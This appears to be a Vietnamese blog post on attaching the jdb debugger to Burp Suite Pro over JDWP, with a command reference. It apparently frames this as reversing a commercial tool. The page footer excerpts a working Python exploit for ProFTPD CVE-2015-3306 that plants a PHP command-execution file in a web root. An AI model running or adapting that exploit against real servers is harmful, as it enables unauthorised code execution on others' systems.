Reversing burpsuit like a pro

 

🔥 BƯỚC 1 — chạy Burp có GUI ổn định

java -jar burpsuite_pro.jar

🔥 BƯỚC 2 — bật JDWP debug (GUI vẫn chạy)

Mở Burp bằng debug port:

java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar burpsuite_pro.jar
👉 Khi đúng bạn phải thấy:
Listening for transport dt_socket at address: 5005
🔥 BƯỚC 3 — kiểm tra port debug


netstat -ano | findstr 5005


Kết quả đúng:


LISTENING




🔥 BƯỚC 4 — attach jdb vào Burp


jdb -connect com.sun.jdi.SocketAttach:hostname=127.0.0.1,port=5005


👉 nếu OK:


Initializing jdb...
>
🔥 BƯỚC 5 — kiểm tra threads


Trong jdb:


threads
🔥 BƯỚC 6 — test breakpoint (cơ bản)


stop in java.lang.Thread.run
🧠 LUỒNG HOẠT ĐỘNG CHUẨN


Burp start
→ GUI OK
→ JDWP open 5005
→ jdb attach
→ breakpoint hit
→ inspect runtime
=============================
Dưới đây là phím tắt (commands) quan trọng trong jdb — cái bạn đang dùng để debug Burp.
🔥 1. Điều khiển execution
LệnhTác dụng
contchạy tiếp JVM (resume)
stepbước vào method (step into)
nextbước qua method (step over)
step upthoát khỏi method hiện tại
🎯 2. Breakpoint
LệnhTác dụng
stop in <class>.<method>đặt breakpoint
clearliệt kê breakpoint
clear <class>.<method>xóa breakpoint cụ thể
clear *xóa tất cả breakpoint
🧠 3. Xem trạng thái debug
LệnhTác dụng
threadsxem tất cả thread
wherexem stack trace
whereistack chi tiết hơn
thread <id>chuyển thread
🔍 4. Inspect data
LệnhTác dụng
localsxem biến local
print <var>in biến
dump <object>xem object chi tiết
🚀 5. Class & method
LệnhTác dụng
classeslist tất cả class
methods <class>xem method trong class
⚡ 6. Debug flow nhanh (quan trọng)
Workflow bạn sẽ dùng nhiều:
stop in <method>
→ cont
→ breakpoint hit
→ where
→ locals
→ step / next
→ cont
⚠️ 7. Phím quan trọng nhất bạn đang cần
Với case Burp của bạn:
  • cont → thoát breakpoint loop
  • clear * → reset sạch breakpoint
  • where → hiểu bạn đang đứng ở đâu
🧠 8. Tip quan trọng (cho Burp debug)
Bạn đang bị spam worker thread, nên:
👉 tránh:
  • Thread.run
  • runWorker
👉 ưu tiên:
  • trigger request trong GUI
  • rồi mới debug đúng thread
🚀 Nếu bạn muốn nâng level
Mình có thể chỉ bạn:
👉 cách debug Burp theo “request lifecycle”
  • Proxy → HTTP handler → response flow
  • không bị dính SwingWorker / thread noise nữa
Chỉ cần nói: flow HTTP trong Burp.

Nhận xét

Đăng nhận xét

Bài đăng phổ biến từ blog này

CVE-2023–41425 but only RCE part

Hình ảnh
CVE-2023–41425 Lời nói đầu: Bài viết này có ở đây để mình hiểu sâu hơn về cách tìm lỗi trong các mã nguồn CMS, rất mong được mọi người đón nhận và sửa lỗi nếu có sai sót.  ---------------------------------------------------------------------------------------------------------------------------- Đầu tiên lên nvd.nist.gov để tìm hiểu lỗi. Như trên hình thì nó cho ta biết một lỗi XSS tại version 3.2.0->3.4.2 của Wonder CMS có thể dẫn đến RCE thông qua installModule component. Mình cũng nói trước là mình chỉ research RCE part, còn XSS thì mình sẽ không quan tâm mặc dù nó cũng trong phần Attack Chain Tiến hành download bản lỗi, tại đây mình download bản 3.4.2 cũng tức là bản đang có lỗi này.  Tại dòng 146, mình thấy có hàm installUpdateModuleAction(). Tuy nhiên, dòng 142 cho biết chúng ta phải đăng nhập mới có thể sử dụng tính năng này. -> cần xác thực Vì muốn hiểu cách thức RCE nên mình sẽ bỏ qua phần xác thực, tiến hành đăng nhập luôn Hàm này sẽ hoạt động như nào...
Đọc thêm

CVE-2015-3306

#!/usr/bin/env python3 import sys import socket import requests def exploit ( client , target ):     client .connect(( target , 21 )) # Connecting to the target server     banner = client .recv( 74 )     print ( banner .decode())     client .send( b 'site cpfr /proc/self/cmdline \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /tmp/<?php system("id"); ?> \r\n ' ) # phpinfo() is just a PoC.     print ( client .recv( 1024 ).decode())     client .send( b 'site cpfr /tmp/<?php system("id"); ?> \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /var/www/html/konchan.php \r\n ' )     print ( client .recv( 1024 ).decode())     client .close()     print ( 'Exploit Completed' ) def check ( url ):     req = requests . get ( url ) # Requesting the written PoC php file via HT...
Đọc thêm